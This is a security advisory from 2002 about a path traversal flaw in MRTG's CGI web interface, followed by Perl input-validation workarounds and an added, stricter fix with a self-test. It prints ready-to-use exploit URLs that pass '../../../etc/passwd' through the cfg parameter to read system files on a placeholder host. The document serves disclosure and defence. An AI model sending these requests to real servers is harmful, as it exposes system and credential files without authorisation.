3rd Feb 2002 [SBWID-5059]
COMMAND
mrtg monitoring web interface may be fooled to read system files
SYSTEMS AFFECTED
MRTG 2.9.18pre1 and previous ??
PROBLEM
UkR-XblP of UkR security team reported :
The following is self explanatory -
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
SOLUTION
Patch available soon ??
http://www.mrtg.org
Workaround, parse input :
# NB: the [...] is a character class, so this strips every '(', '.', ')', '|'
# and '/' character from the input rather than matching the sequence "..".
# That does neutralise the traversal, but it also mangles legitimate names
# such as mrtg.cfg (which loses its dot); rejecting bad input is preferable.
$input =~ s/[(\.\.)|\/]//g;
Update (04 February 2002) "SJ" proposed :
# $q is the CGI.pm query object of the script
my $SECMSG = "Pliz dont hekk us\n";
if(!defined $q->param('cfg')){ die "missing cfg file\n"; }
my $xx = $q->param('cfg');
# refuse '..', '//' and './' anywhere in the value
if($xx =~ /\.\.|\/\/|\.\//){ die $SECMSG; }
# tr///dc counts (and deletes) every character outside the allow-list, so any
# such character is fatal. Note that '.' is not in the list, so a name like
# mrtg.cfg is refused as well.
if($xx =~ tr/a-zA-Z0-9_\-//dc){ die $SECMSG; }
you could also check the ownership of $cfgfile and deny opening root
(and maybe other) owned files.
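A stricter version of the same idea, added here as an example (it is not code from the advisory, from "SJ", or from the MRTG project): instead of stripping characters, refuse anything that is not a single allow-listed file name, then resolve the path and confirm it still lies under the configuration directory. The directory /etc/mrtg and the function name safe_cfg_path are assumptions; the self-check at the end builds a throw-away directory so the script runs without an MRTG installation.

```perl
#!/usr/bin/perl
# Added example, not from the advisory or from MRTG: confine the cfg
# parameter of a CGI to one directory of configuration files.
use strict;
use warnings;
use File::Spec;
use Cwd qw(abs_path);
use File::Temp qw(tempdir);

# Assumed location of the MRTG configuration files (site-specific).
my $CFG_DIR = '/etc/mrtg';

# Returns the absolute path of the requested file, or undef when the request
# must be refused. Three layers: 1 and 3 each independently stop the
# ../../../etc/passwd requests quoted in the advisory; 2 closes the one gap
# the allow-list leaves.
#   1. allow-list the characters of a bare file name (no '/', no NUL, no space),
#   2. refuse '.' and '..', which the allow-list still admits,
#   3. resolve symlinks, require a regular file, and check it is under $CFG_DIR.
sub safe_cfg_path {
    my ($cfg) = @_;
    return undef unless defined $cfg && length $cfg;

    return undef unless $cfg =~ /\A[A-Za-z0-9_.-]+\z/;     # layer 1
    return undef if $cfg eq '.' || $cfg eq '..';            # layer 2

    my $base = abs_path($CFG_DIR);                          # layer 3
    return undef unless defined $base;
    my $path = abs_path(File::Spec->catfile($base, $cfg));
    return undef unless defined $path && -f $path;
    return undef unless index($path, "$base/") == 0;
    return $path;
}

# In a CGI (CGI.pm, as in the "SJ" workaround above) the call would be:
#   my $file = safe_cfg_path($q->param('cfg'))
#       or do { print "Status: 400 Bad Request\r\n\r\n"; exit };

# Self-check with a constructed, throw-away config directory, so the script
# runs offline without an MRTG installation.
$CFG_DIR = tempdir(CLEANUP => 1);
open my $fh, '>', "$CFG_DIR/mrtg.cfg" or die "cannot write sample cfg: $!";
print $fh "WorkDir: /var/www/mrtg\n";
close $fh;

for my $cfg ('mrtg.cfg', '../../../../../../../../etc/passwd', '..',
             'nosuch.cfg', '/etc/passwd', "mrtg.cfg\0") {
    my $p = safe_cfg_path($cfg);
    printf "%-40s -> %s\n", $cfg =~ s/\0/\\0/r,
           defined $p ? "OK  $p" : 'REFUSED';
}
```

Only mrtg.cfg is accepted; the traversal string, a bare "..", an absolute path, an embedded NUL and a non-existent name are all refused. The prefix check in layer 3 is what protects against a symlink placed inside the config directory, which the two regex-only workarounds above cannot see.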